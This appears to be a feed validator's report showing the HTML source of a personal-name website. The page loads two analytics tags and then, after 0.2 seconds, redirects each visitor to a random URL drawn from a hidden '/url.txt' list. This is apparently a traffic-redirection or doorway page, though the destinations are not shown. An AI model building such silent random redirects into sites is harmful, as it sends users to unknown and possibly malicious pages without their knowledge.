It looks like this is a web page, not a feed. I looked for a feed associated with this page, but couldn't find one. Please enter the address of your feed to validate.

Source: https://antonellocherubini.com/

  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4.    <meta charset="UTF-8">
  5.    <meta http-equiv="X-UA-Compatible" content="IE=edge">
  6.    <meta name="viewport" content="width=device-width, initial-scale=1.0">
  7.    <title>Redirecting</title>
  8.    <!-- Google tag (gtag.js) -->
  9.    <script async src="https://www.googletagmanager.com/gtag/js?id=G-K67EHMCH37"></script>
  10.    <script>
  11.      window.dataLayer = window.dataLayer || [];
  12.      function gtag(){dataLayer.push(arguments);}
  13.      gtag('js', new Date());
  14.    
  15.      gtag('config', 'G-K67EHMCH37');
  16.    </script>
  17.    <script async src="https://www.googletagmanager.com/gtag/js?id=G-RG3Q43BBVD"></script>
  18.    <script>
  19.      window.dataLayer = window.dataLayer || [];
  20.      function gtag(){dataLayer.push(arguments);}
  21.      gtag('js', new Date());
  22.    
  23.      gtag('config', 'G-RG3Q43BBVD');
  24.    </script>
  25. </head>
  26. <body>
  27.    <script>
  28.        function readTextFile(file, callback) {
  29.            var rawFile = new XMLHttpRequest();
  30.            rawFile.overrideMimeType("application/json");
  31.            rawFile.open("GET", file, true);
  32.            rawFile.onreadystatechange = function() {
  33.                if (rawFile.readyState === 4 && rawFile.status == "200") {
  34.                    callback(rawFile.responseText);
  35.                }
  36.            }
  37.            rawFile.send(null);
  38.        }
  39.  
  40.        readTextFile("/url.txt", function(text){
  41.            var urls = text.split("\n");
  42.            var randomUrl = urls[Math.floor(Math.random() * urls.length)];
  43.            setTimeout(function() {
  44.                window.location.href = randomUrl;
  45.            }, 200); // 0.2秒延迟
  46.        });
  47.    </script>
  48. </body>
  49. </html>
  50.  
Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda